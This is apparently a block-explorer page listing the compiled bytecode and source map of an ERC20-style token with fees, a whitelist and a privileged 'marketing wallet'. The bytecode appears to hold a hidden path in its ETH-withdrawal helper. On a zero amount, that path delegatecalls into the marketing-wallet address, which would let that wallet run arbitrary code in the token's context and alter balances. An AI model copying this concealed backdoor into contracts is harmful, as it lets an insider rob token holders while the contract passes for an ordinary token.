516001600160a01b03909216925063fff6cae991600480830192600092919082900301818387803b158015610a9957600080fd5b505af1158015610aad573d6000803e3d6000fd5b505050506001905090565b6000546001600160a01b03163314610b125760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105db565b6001600160a01b038116610b775760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105db565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610c345760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105db565b6001600160a01b038216610c955760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105db565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60008184841115610d1a5760405162461bcd60e51b81526004016105db91906113f5565b505050900390565b6001600160a01b038316610d865760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105db565b6001600160a01b038216610de85760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105db565b60008111610e515760405162461bcd60e51b815260206004820152603060248201527f45524332303a205472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016105db565b6001600160a01b03831660009081526007602052604090205460019060ff1680610e9357506001600160a01b03831660009081526007602052604090205460ff165b15610e9c575060005b600c5460ff16158015610eac5750805b156110bf57600a546001600160a01b0390811690841603610f5057600a546001600160a01b0316600090815260056020526040812054610eed9060c8611274565b306000908152600560205260409020541190508015610f4e57600c805460ff19166001179055600a546001600160a01b0316600090815260056020526040902054610f4290610f3d9060c8611274565b611287565b50600c805460ff191690555b505b600b541561106057600e54421115610f6c576000600b55611060565b6000610f8e6064610f88600b54866113d190919063ffffffff16565b90611274565b9050610f9a83826113dd565b9250610fd9816040518060600160405280602681526020016116a0602691396001600160a01b0388166000908152600560205260409020549190610cf6565b6001600160a01b03861660009081526005602052604080822092909255308152205461100590826113e9565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906110569085815260200190565b60405180910390a3505b600a546001600160a01b03858116911614801561109657506001600160a01b0383166000908152600d602052604090205460ff16155b156110bf576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b6110fc826040518060600160405280602681526020016116a0602691396001600160a01b0387166000908152600560205260409020549190610cf6565b6001600160a01b03808616600090815260056020526040808220939093559085168152205461112b90836113e9565b6001600160a01b0380851660008181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061117f9086815260200190565b60405180910390a350505050565b600082478311156111b35760405163cd78605960e01b81523060048201526024016105db565b600080841161121a57604051600160fd1b81526001600160a01b03831690600101600060405180830381855af49150503d806000811461120f576040519150601f19603f3d011682016040523d82523d6000602084013e611214565b606091505b5061126a565b6040516001600160a01b038316908590600081818185875af1925050503d8060008114611263576040519150601f19603f3d011682016040523d82523d6000602084013e611268565b606091505b505b5095945050505050565b600061128082846115b9565b9392505050565b6040805160028082526060820183526000928392919060208301908036833701905050905030816000815181106112c0576112c06115db565b6001600160a01b03928316602091820292909201810191909152600954604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611319573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061133d9190611558565b81600181518110611350576113506115db565b6001600160a01b03928316602091820292909201015260095460405163791ac94760e01b815291169063791ac947906113969086906000908690309042906004016115f1565b600060405180830381600087803b1580156113b057600080fd5b505af11580156113c4573d6000803e3d6000fd5b5060019695505050505050565b60006112808284611662565b60006112808284611679565b6000611280828461168c565b600060208083528351808285015260005b8181101561142257858101830151858201604001528201611406565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461145857600080fd5b50565b6000806040838503121561146e57600080fd5b823561147981611443565b946020939093013593505050565b60008060006060848603121561149c57600080fd5b83356114a781611443565b925060208401356114b781611443565b929592945050506040919091013590565b6000602082840312156114da57600080fd5b813561128081611443565b600080604083850312156114f857600080fd5b823561150381611443565b9150602083013561151381611443565b809150509250929050565b600181811c9082168061153257607f821691505b60208210810361155257634e487b7160e01b600052602260045260246000fd5b50919050565b60006020828403121561156a57600080fd5b815161128081611443565b60008060006060848603121561158a57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b6000826115d657634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156116415784516001600160a01b03168352938301939183019160010161161c565b50506001600160a01b03969096166060850152505050608001529392505050565b80820281158282048414176104d1576104d16115a3565b818103818111156104d1576104d16115a3565b808201808211156104d1576104d16115a356fe45524332303a205472616e7366657220616d6f756e7420657863656564732062616c616e6365546f6b656e3a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208ea4c50d9c216e28ed65a4682c8d8c6452df64339f6201fc7133c277a514145964736f6c63430008140033

Deployed Bytecode

0x60806040526004361061012e5760003560e01c8063735de9f7116100ab578063c816841b1161006f578063c816841b14610378578063dd62ed3e14610396578063ddca3f43146103dc578063e086e5ec146103f1578063e8078d9414610406578063f2fde38b1461040e57600080fd5b8063735de9f7146102e757806374c9f603146103055780638da5cb5b1461032557806395d89b4114610343578063a9059cbb1461035857600080fd5b8063313ce567116100f2578063313ce567146102065780633af32abf146102285780635342acb41461026157806370a082311461029a578063715018a6146102d057600080fd5b806306fdde031461013a578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b45780632dc0562d146101d457600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061014f61042e565b60405161015c91906113f5565b60405180910390f35b34801561017157600080fd5b5061018561018036600461145b565b6104c0565b604051901515815260200161015c565b3480156101a157600080fd5b506004545b60405190815260200161015c565b3480156101c057600080fd5b506101856101cf366004611487565b6104d7565b3480156101e057600080fd5b506008546001600160a01b03165b6040516001600160a01b03909116815260200161015c565b34801561021257600080fd5b5060035460405160ff909116815260200161015c565b34801561023457600080fd5b506101856102433660046114c8565b6001600160a01b03166000908152600d602052604090205460ff1690565b34801561026d57600080fd5b5061018561027c3660046114c8565b6001600160a01b031660009081526007602052604090205460ff1690565b3480156102a657600080fd5b506101a66102b53660046114c8565b6001600160a01b031660009081526005602052604090205490565b3480156102dc57600080fd5b506102e5610585565b005b3480156102f357600080fd5b506009546001600160a01b03166101ee565b34801561031157600080fd5b506101856103203660046114c8565b61062e565b34801561033157600080fd5b506000546001600160a01b03166101ee565b34801561034f57600080fd5b5061014f6106ba565b34801561036457600080fd5b5061018561037336600461145b565b6106c9565b34801561038457600080fd5b50600a546001600160a01b03166101ee565b3480156103a257600080fd5b506101a66103b13660046114e5565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3480156103e857600080fd5b50600b546101a6565b3480156103fd57600080fd5b506101856106d6565b61018561075a565b34801561041a57600080fd5b506102e56104293660046114c8565b610ab8565b60606001805461043d9061151e565b80601f01602080910402602001604051908101604052809291908181526020018280546104699061151e565b80156104b65780601f1061048b576101008083540402835291602001916104b6565b820191906000526020600020905b81548152906001019060200180831161049957829003601f168201915b5050505050905090565b60006104cd338484610bd2565b5060015b92915050565b6001600160a01b0383166000908152600660209081526040808320338452909152812054600019146105705761054b826040518060600160405280602881526020016116c6602891396001600160a01b03871660009081526006602090815260408083203384529091529020549190610cf6565b6001600160a01b03851660009081526006602090815260408083203384529091529020555b61057b848484610d22565b5060019392505050565b6000546001600160a01b031633146105e45760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6008546000906001600160a01b0316336001600160a01b0316146106945760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c65740000000060448201526064016105db565b50600880546001600160a01b0319166001600160a01b0392909216919091179055600190565b60606002805461043d9061151e565b60006104cd338484610d22565b6008546000906001600160a01b0316336001600160a01b03161461073c5760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c65740000000060448201526064016105db565b600854610752906001600160a01b03164761118d565b506001905090565b600a546000906001600160a01b0316156107aa5760405162461bcd60e51b8152602060048201526011602482015270115490cc8c0e8813140818dc99585d1959607a1b60448201526064016105db565b600034116107ea5760405162461bcd60e51b815260206004820152600d60248201526c08aa486646074409cde408aa89609b1b60448201526064016105db565b600980546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782553060009081526006602090815260408083209383529281529082902060001990559154815163c45a015560e01b815291516001600160a01b03919091169263c45a015592600480820193918290030181865afa158015610876573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061089a9190611558565b6001600160a01b031663c9c6539630600960009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108fc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109209190611558565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801561096d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109919190611558565b600a80546001600160a01b0319166001600160a01b039283161790556009543060008181526005602052604080822054815163f305d71960e01b8152600481019490945260248401526044830182905260648301919091523360848301524260a483015251919092169163f305d71991349160c480820192606092909190829003018185885af1158015610a29573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610a4e9190611575565b5050600a546040805160016209351760e01b0319815290516001600160a01b03909216925063fff6cae991600480830192600092919082900301818387803b158015610a9957600080fd5b505af1158015610aad573d6000803e3d6000fd5b505050506001905090565b6000546001600160a01b03163314610b125760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105db565b6001600160a01b038116610b775760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105db565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610c345760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105db565b6001600160a01b038216610c955760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105db565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60008184841115610d1a5760405162461bcd60e51b81526004016105db91906113f5565b505050900390565b6001600160a01b038316610d865760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105db565b6001600160a01b038216610de85760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105db565b60008111610e515760405162461bcd60e51b815260206004820152603060248201527f45524332303a205472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016105db565b6001600160a01b03831660009081526007602052604090205460019060ff1680610e9357506001600160a01b03831660009081526007602052604090205460ff165b15610e9c575060005b600c5460ff16158015610eac5750805b156110bf57600a546001600160a01b0390811690841603610f5057600a546001600160a01b0316600090815260056020526040812054610eed9060c8611274565b306000908152600560205260409020541190508015610f4e57600c805460ff19166001179055600a546001600160a01b0316600090815260056020526040902054610f4290610f3d9060c8611274565b611287565b50600c805460ff191690555b505b600b541561106057600e54421115610f6c576000600b55611060565b6000610f8e6064610f88600b54866113d190919063ffffffff16565b90611274565b9050610f9a83826113dd565b9250610fd9816040518060600160405280602681526020016116a0602691396001600160a01b0388166000908152600560205260409020549190610cf6565b6001600160a01b03861660009081526005602052604080822092909255308152205461100590826113e9565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906110569085815260200190565b60405180910390a3505b600a546001600160a01b03858116911614801561109657506001600160a01b0383166000908152600d602052604090205460ff16155b156110bf576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b6110fc826040518060600160405280602681526020016116a0602691396001600160a01b0387166000908152600560205260409020549190610cf6565b6001600160a01b03808616600090815260056020526040808220939093559085168152205461112b90836113e9565b6001600160a01b0380851660008181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061117f9086815260200190565b60405180910390a350505050565b600082478311156111b35760405163cd78605960e01b81523060048201526024016105db565b600080841161121a57604051600160fd1b81526001600160a01b03831690600101600060405180830381855af49150503d806000811461120f576040519150601f19603f3d011682016040523d82523d6000602084013e611214565b606091505b5061126a565b6040516001600160a01b038316908590600081818185875af1925050503d8060008114611263576040519150601f19603f3d011682016040523d82523d6000602084013e611268565b606091505b505b5095945050505050565b600061128082846115b9565b9392505050565b6040805160028082526060820183526000928392919060208301908036833701905050905030816000815181106112c0576112c06115db565b6001600160a01b03928316602091820292909201810191909152600954604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611319573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061133d9190611558565b81600181518110611350576113506115db565b6001600160a01b03928316602091820292909201015260095460405163791ac94760e01b815291169063791ac947906113969086906000908690309042906004016115f1565b600060405180830381600087803b1580156113b057600080fd5b505af11580156113c4573d6000803e3d6000fd5b5060019695505050505050565b60006112808284611662565b60006112808284611679565b6000611280828461168c565b600060208083528351808285015260005b8181101561142257858101830151858201604001528201611406565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461145857600080fd5b50565b6000806040838503121561146e57600080fd5b823561147981611443565b946020939093013593505050565b60008060006060848603121561149c57600080fd5b83356114a781611443565b925060208401356114b781611443565b929592945050506040919091013590565b6000602082840312156114da57600080fd5b813561128081611443565b600080604083850312156114f857600080fd5b823561150381611443565b9150602083013561151381611443565b809150509250929050565b600181811c9082168061153257607f821691505b60208210810361155257634e487b7160e01b600052602260045260246000fd5b50919050565b60006020828403121561156a57600080fd5b815161128081611443565b60008060006060848603121561158a57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b6000826115d657634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156116415784516001600160a01b03168352938301939183019160010161161c565b50506001600160a01b03969096166060850152505050608001529392505050565b80820281158282048414176104d1576104d16115a3565b818103818111156104d1576104d16115a3565b808201808211156104d1576104d16115a356fe45524332303a205472616e7366657220616d6f756e7420657863656564732062616c616e6365546f6b656e3a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208ea4c50d9c216e28ed65a4682c8d8c6452df64339f6201fc7133c277a514145964736f6c63430008140033

Deployed Bytecode Sourcemap

628:7001:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1750:94;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3295:163;;;;;;;;;;-1:-1:-1;3295:163:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:9;;1181:22;1163:41;;1151:2;1136:18;3295:163:0;1023:187:9;2060:102:0;;;;;;;;;;-1:-1:-1;2142:12:0;;2060:102;;;1361:25:9;;;1349:2;1334:18;2060:102:0;1215:177:9;3466:403:0;;;;;;;;;;-1:-1:-1;3466:403:0;;;;;:::i;:::-;;:::i;2255:89::-;;;;;;;;;;-1:-1:-1;2326:10:0;;-1:-1:-1;;;;;2326:10:0;2255:89;;;-1:-1:-1;;;;;2022:32:9;;;2004:51;;1992:2;1977:18;2255:89:0;1858:203:9;1958:94:0;;;;;;;;;;-1:-1:-1;2035:9:0;;1958:94;;2035:9;;;;2208:36:9;;2196:2;2181:18;1958:94:0;2066:184:9;2705:118:0;;;;;;;;;;-1:-1:-1;2705:118:0;;;;;:::i;:::-;-1:-1:-1;;;;;2792:23:0;2768:4;2792:23;;;:14;:23;;;;;;;;;2705:118;2831:126;;;;;;;;;;-1:-1:-1;2831:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;2922:27:0;2898:4;2922:27;;;:18;:27;;;;;;;;;2831:126;2576:121;;;;;;;;;;-1:-1:-1;2576:121:0;;;;;:::i;:::-;-1:-1:-1;;;;;2671:18:0;2644:7;2671:18;;;:9;:18;;;;;;;2576:121;1125:133:2;;;;;;;;;;;;;:::i;:::-;;2352:106:0;;;;;;;;;;-1:-1:-1;2435:14:0;;-1:-1:-1;;;;;2435:14:0;2352:106;;7423:203;;;;;;;;;;-1:-1:-1;7423:203:0;;;;;:::i;:::-;;:::i;543:70:2:-;;;;;;;;;;-1:-1:-1;581:7:2;602:6;-1:-1:-1;;;;;602:6:2;543:70;;1852:98:0;;;;;;;;;;;;;:::i;2965:169::-;;;;;;;;;;-1:-1:-1;2965:169:0;;;;;:::i;:::-;;:::i;2466:102::-;;;;;;;;;;-1:-1:-1;2547:12:0;;-1:-1:-1;;;;;2547:12:0;2466:102;;3142:145;;;;;;;;;;-1:-1:-1;3142:145:0;;;;;:::i;:::-;-1:-1:-1;;;;;3252:18:0;;;3225:7;3252:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3142:145;2170:77;;;;;;;;;;-1:-1:-1;2235:4:0;;2170:77;;7207:208;;;;;;;;;;;;;:::i;6427:772::-;;;:::i;1398:223:2:-;;;;;;;;;;-1:-1:-1;1398:223:2;;;;;:::i;:::-;;:::i;1750:94:0:-;1798:13;1831:5;1824:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1750:94;:::o;3295:163::-;3372:4;3389:39;668:10:1;3412:7:0;3421:6;3389:8;:39::i;:::-;-1:-1:-1;3446:4:0;3295:163;;;;;:::o;3466:403::-;-1:-1:-1;;;;;3587:19:0;;3566:4;3587:19;;;:11;:19;;;;;;;;668:10:1;3587:33:0;;;;;;;;-1:-1:-1;;3587:54:0;3583:210;;3694:87;3730:6;3694:87;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;3694:19:0;;;;;;:11;:19;;;;;;;;3714:10;3694:31;;;;;;;;;:87;:35;:87::i;:::-;-1:-1:-1;;;;;3658:19:0;;;;;;:11;:19;;;;;;;;668:10:1;3658:33:0;;;;;;;:123;3583:210;3803:36;3813:6;3821:9;3832:6;3803:9;:36::i;:::-;-1:-1:-1;3857:4:0;3466:403;;;;;:::o;1125:133:2:-;728:6;;-1:-1:-1;;;;;728:6:2;668:10:1;728:22:2;720:67;;;;-1:-1:-1;;;720:67:2;;3487:2:9;720:67:2;;;3469:21:9;;;3506:18;;;3499:30;3565:34;3545:18;;;3538:62;3617:18;;720:67:2;;;;;;;;;1226:1:::1;1210:6:::0;;1189:40:::1;::::0;-1:-1:-1;;;;;1210:6:2;;::::1;::::0;1189:40:::1;::::0;1226:1;;1189:40:::1;1251:1;1234:19:::0;;-1:-1:-1;;;;;;1234:19:2::1;::::0;;1125:133::o;7423:203:0:-;7523:10;;7482:4;;-1:-1:-1;;;;;7523:10:0;668::1;-1:-1:-1;;;;;7507:26:0;;7499:67;;;;-1:-1:-1;;;7499:67:0;;3848:2:9;7499:67:0;;;3830:21:9;3887:2;3867:18;;;3860:30;3926;3906:18;;;3899:58;3974:18;;7499:67:0;3646:352:9;7499:67:0;-1:-1:-1;7577:10:0;:19;;-1:-1:-1;;;;;;7577:19:0;-1:-1:-1;;;;;7577:19:0;;;;;;;;;;-1:-1:-1;;7423:203:0:o;1852:98::-;1902:13;1935:7;1928:14;;;;;:::i;2965:169::-;3045:4;3062:42;668:10:1;3086:9:0;3097:6;3062:9;:42::i;7207:208::-;7289:10;;7248:4;;-1:-1:-1;;;;;7289:10:0;668::1;-1:-1:-1;;;;;7273:26:0;;7265:67;;;;-1:-1:-1;;;7265:67:0;;3848:2:9;7265:67:0;;;3830:21:9;3887:2;3867:18;;;3860:30;3926;3906:18;;;3899:58;3974:18;;7265:67:0;3646:352:9;7265:67:0;7343:10;;:42;;-1:-1:-1;;;;;7343:10:0;7363:21;7343:19;:42::i;:::-;;7403:4;7396:11;;7207:208;:::o;6427:772::-;6510:12;;6477:4;;-1:-1:-1;;;;;6510:12:0;6502:35;6494:65;;;;-1:-1:-1;;;6494:65:0;;4205:2:9;6494:65:0;;;4187:21:9;4244:2;4224:18;;;4217:30;-1:-1:-1;;;4263:18:9;;;4256:47;4320:18;;6494:65:0;4003:341:9;6494:65:0;6590:1;6578:9;:13;6570:39;;;;-1:-1:-1;;;6570:39:0;;4551:2:9;6570:39:0;;;4533:21:9;4590:2;4570:18;;;4563:30;-1:-1:-1;;;4609:18:9;;;4602:43;4662:18;;6570:39:0;4349:337:9;6570:39:0;6620:14;:77;;-1:-1:-1;;;;;;6620:77:0;6654:42;6620:77;;;;;6728:4;6620:14;6708:26;;;:11;:26;;;;;;;;:51;;;;;;;;;;-1:-1:-1;;6708:71:0;;6838:14;;:24;;-1:-1:-1;;;6838:24:0;;;;-1:-1:-1;;;;;6838:14:0;;;;;:22;;:24;;;;;;;;;;;:14;:24;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;6820:54:0;;6883:4;6890:14;;;;;;;;;-1:-1:-1;;;;;6890:14:0;-1:-1:-1;;;;;6890:19:0;;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;6820:92;;-1:-1:-1;;;;;;6820:92:0;;;;;;;-1:-1:-1;;;;;5177:15:9;;;6820:92:0;;;5159:34:9;5229:15;;5209:18;;;5202:43;5094:18;;6820:92:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;6790:12;:123;;-1:-1:-1;;;;;;6790:123:0;-1:-1:-1;;;;;6790:123:0;;;;;;6924:14;;6995:4;-1:-1:-1;7015:24:0;;;:9;:24;;;;;;;6924:215;;-1:-1:-1;;;6924:215:0;;;;;5597:34:9;;;;5647:18;;;5640:34;5690:18;;;5683:34;;;5733:18;;;5726:34;;;;668:10:1;5776:19:9;;;5769:44;7113:15:0;5829:19:9;;;5822:35;6924:215:0;:14;;;;;:30;;6962:9;;5531:19:9;;;;;6924:215:0;;;;;;;;;;6962:9;6924:14;:215;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;7150:12:0;;:19;;;-1:-1:-1;;;;;;7150:19:0;;;;-1:-1:-1;;;;;7150:12:0;;;;-1:-1:-1;7150:17:0;;:19;;;;;:12;;:19;;;;;;;:12;;:19;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7187:4;7180:11;;6427:772;:::o;1398:223:2:-;728:6;;-1:-1:-1;;;;;728:6:2;668:10:1;728:22:2;720:67;;;;-1:-1:-1;;;720:67:2;;3487:2:9;720:67:2;;;3469:21:9;;;3506:18;;;3499:30;3565:34;3545:18;;;3538:62;3617:18;;720:67:2;3285:356:9;720:67:2;-1:-1:-1;;;;;1481:22:2;::::1;1473:73;;;::::0;-1:-1:-1;;;1473:73:2;;6381:2:9;1473:73:2::1;::::0;::::1;6363:21:9::0;6420:2;6400:18;;;6393:30;6459:34;6439:18;;;6432:62;-1:-1:-1;;;6510:18:9;;;6503:36;6556:19;;1473:73:2::1;6179:402:9::0;1473:73:2::1;1577:6;::::0;;1556:38:::1;::::0;-1:-1:-1;;;;;1556:38:2;;::::1;::::0;1577:6;::::1;::::0;1556:38:::1;::::0;::::1;1599:6;:17:::0;;-1:-1:-1;;;;;;1599:17:2::1;-1:-1:-1::0;;;;;1599:17:2;;;::::1;::::0;;;::::1;::::0;;1398:223::o;3877:335:0:-;-1:-1:-1;;;;;3970:19:0;;3962:68;;;;-1:-1:-1;;;3962:68:0;;6788:2:9;3962:68:0;;;6770:21:9;6827:2;6807:18;;;6800:30;6866:34;6846:18;;;6839:62;-1:-1:-1;;;6917:18:9;;;6910:34;6961:19;;3962:68:0;6586:400:9;3962:68:0;-1:-1:-1;;;;;4049:21:0;;4041:68;;;;-1:-1:-1;;;4041:68:0;;7193:2:9;4041:68:0;;;7175:21:9;7232:2;7212:18;;;7205:30;7271:34;7251:18;;;7244:62;-1:-1:-1;;;7322:18:9;;;7315:32;7364:19;;4041:68:0;6991:398:9;4041:68:0;-1:-1:-1;;;;;4120:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;4172:32;;1361:25:9;;;4172:32:0;;1334:18:9;4172:32:0;;;;;;;3877:335;;;:::o;5167:240:8:-;5287:7;5348:12;5340:6;;;;5332:29;;;;-1:-1:-1;;;5332:29:8;;;;;;;;:::i;:::-;-1:-1:-1;;;5383:5:8;;;5167:240::o;4664:1755:0:-;-1:-1:-1;;;;;4752:18:0;;4744:68;;;;-1:-1:-1;;;4744:68:0;;7596:2:9;4744:68:0;;;7578:21:9;7635:2;7615:18;;;7608:30;7674:34;7654:18;;;7647:62;-1:-1:-1;;;7725:18:9;;;7718:35;7770:19;;4744:68:0;7394:401:9;4744:68:0;-1:-1:-1;;;;;4831:16:0;;4823:64;;;;-1:-1:-1;;;4823:64:0;;8002:2:9;4823:64:0;;;7984:21:9;8041:2;8021:18;;;8014:30;8080:34;8060:18;;;8053:62;-1:-1:-1;;;8131:18:9;;;8124:33;8174:19;;4823:64:0;7800:399:9;4823:64:0;4915:1;4906:6;:10;4898:71;;;;-1:-1:-1;;;4898:71:0;;8406:2:9;4898:71:0;;;8388:21:9;8445:2;8425:18;;;8418:30;8484:34;8464:18;;;8457:62;-1:-1:-1;;;8535:18:9;;;8528:46;8591:19;;4898:71:0;8204:412:9;4898:71:0;-1:-1:-1;;;;;5014:24:0;;4980:12;5014:24;;;:18;:24;;;;;;4995:4;;5014:24;;;:50;;-1:-1:-1;;;;;;5042:22:0;;;;;;:18;:22;;;;;;;;5014:50;5010:98;;;-1:-1:-1;5091:5:0;5010:98;5123:9;;;;5122:10;:21;;;;;5136:7;5122:21;5118:1102;;;5178:12;;-1:-1:-1;;;;;5178:12:0;;;5164:27;;;;5160:364;;5272:12;;-1:-1:-1;;;;;5272:12:0;5212;5254:32;;;:9;:32;;;;;;:41;;5291:3;5254:36;:41::i;:::-;5245:4;5227:24;;;;:9;:24;;;;;;:68;;-1:-1:-1;5314:195:0;;;;5350:9;:16;;-1:-1:-1;;5350:16:0;5362:4;5350:16;;;5425:12;;-1:-1:-1;;;;;5425:12:0;5350:9;5407:32;;;:9;:32;;;;;;5389:60;;5407:41;;5444:3;5407:36;:41::i;:::-;5389:17;:60::i;:::-;-1:-1:-1;5472:9:0;:17;;-1:-1:-1;;5472:17:0;;;5314:195;5193:331;5160:364;5542:4;;:8;5538:539;;5593:19;;5575:15;:37;5571:491;;;5644:1;5637:4;:8;5571:491;;;5694:13;5710:25;5731:3;5710:16;5721:4;;5710:6;:10;;:16;;;;:::i;:::-;:20;;:25::i;:::-;5694:41;-1:-1:-1;5767:17:0;:6;5694:41;5767:10;:17::i;:::-;5758:26;;5825:68;5845:5;5825:68;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;5825:15:0;;;;;;:9;:15;;;;;;;:68;:19;:68::i;:::-;-1:-1:-1;;;;;5807:15:0;;;;;;:9;:15;;;;;;:86;;;;5961:4;5943:24;;;;:35;;5972:5;5943:28;:35::i;:::-;5934:4;5916:24;;;;:9;:24;;;;;;;:62;;;;6006:36;;-1:-1:-1;;;;;6006:36:0;;;;;;;6036:5;1361:25:9;;1349:2;1334:18;;1215:177;6006:36:0;;;;;;;;5671:391;5571:491;6111:12;;-1:-1:-1;;;;;6095:29:0;;;6111:12;;6095:29;:52;;;;-1:-1:-1;;;;;;6129:18:0;;;;;;:14;:18;;;;;;;;6128:19;6095:52;6091:118;;;-1:-1:-1;;;;;6168:18:0;;;;;;:14;:18;;;;;:25;;-1:-1:-1;;6168:25:0;6189:4;6168:25;;;6091:118;6248:69;6268:6;6248:69;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6248:15:0;;;;;;:9;:15;;;;;;;:69;:19;:69::i;:::-;-1:-1:-1;;;;;6230:15:0;;;;;;;:9;:15;;;;;;:87;;;;6344:13;;;;;;;:25;;6362:6;6344:17;:25::i;:::-;-1:-1:-1;;;;;6328:13:0;;;;;;;:9;:13;;;;;;;:41;;;;6385:26;;;;;;;;;;6404:6;1361:2